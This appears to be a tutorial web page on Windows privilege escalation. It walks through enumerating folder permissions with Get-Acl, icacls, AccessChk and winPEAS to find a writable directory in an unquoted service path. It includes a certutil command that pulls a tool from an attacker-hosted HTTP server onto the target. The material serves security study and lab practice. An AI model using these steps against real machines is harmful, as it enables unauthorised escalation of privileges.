Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

ENUMERATING SERVICE WITH GET-ACL (POWERSHELL)

  1. Get-Acl is a built-in cmdlet in PowerShell and comes by default with Windows PowerShell. You do not need to install any additional modules to use it.
    https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4

    NOTE: we can use the following command to enumerate the folder permissions

  2. We can see that Get-Acl doesn’t explicitly say “Modify” for C:\ like icacls does. Instead, it provides an "Access Mask Format", where the numbers represent specific permissions, with one of them essentially being the numerical representation for Modify.
    Get-Acl -Path C:\ | Format-List

  3. Numerical value -1610612736 represents Read and Execute permissions.
    Get-Acl -Path "C:\Program Files" | Format-List

  4. And here we found that BUILTIN\Users have FullControl on C:\Program Files\Unquoted Path Service.
    Get-Acl -Path "C:\Program Files\Unquoted Path Service" | Format-List

ENUMERATING SERVICE WITH ICALCS (CMD)

  1. To verify permissions with icacls, it's important to understand the permissions for each directory.
    Check Microsoft documentation to learn more about permissions.

  2. Administrators and SYSTEM have Full Control, and Authenticated Users can create folders but not files.
    icacls C:\

  3. TrustedInstaller has Full Control, SYSTEM and Administrators have Modify and Full Control, and Users have Read and Execute permissions.
    icacls "C:\Program Files"

  4. Users have Full Control SYSTEM, and Administrators have Full Control with inherited permissions.
    icacls "C:\Program Files\Unquoted Path Service"

  5. All users have Read & Execute permissions, SYSTEM, and Administrators have inherited Full Control, CREATOR OWNER has inherited Full Control
    icacls "C:\Program Files\Unquoted Path Service\Common Files"

  6. Our POC shows that moving an EXE file to C:\, C:\Program Files, or C:\Program Files\Unquoted Path Service\Common Files is blocked, but it succeeds in C:\Program Files\Unquoted Path Service\.

ENUMERATING SERVICE PERMISSION WITH ACCESSCHK

  1. If you don't have the Sysinternals Suite on your machine, you can download it from the official Microsoft Website.

    NOTE: We have identified that the target machine is a 64-bit architecture using the following command:
    systeminfo | findstr /B /C:"System Type"

  2. Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
    certutil -urlcache -f http://[IP-ADRESS]:8000/accesschk64.exe accesschk64.exe

    NOTE: With accesschk now on the target system, we can use the following command to enumerate the folder permissions

  3. The output from AccessChk shows our permissions on C: It indicates that we have write (W) access, but it is restricted to creating folders only (FILE_ADD_SUBDIRECTORY).
    .\accesschk64.exe -wvud "C:\" -accepteula

  4. accesschk64.exe shows that NT AUTHORITY\SYSTEM and BUILTIN\Administrators have extensive permissions,
    while a standard user has no write permissions.
    .\accesschk64.exe -wvud "C:\Program Files" -accepteula

  5. finally All users, including standard users, have full write permissions in C:\Program Files\Unquoted Path Service.
    .\accesschk64.exe -wvud "C:\Program Files\Unquoted Path Service" -accepteula

ENUMERATING SERVICE WITH WINPEAS

  1. When we used winPEAS in the Hunting Section, we found an unquoted service path in the “Service Information” section.

  2. we can scroll down through the output to the “Application Information” section and then check under the “Installed Applications” sub-section. If we can exploit this service, we will identify which folder in the unquoted service path has write permissions.

NOTE

If we do not find a writable folder in this section associated with the unquoted service path, we likely won’t be able to exploit this service.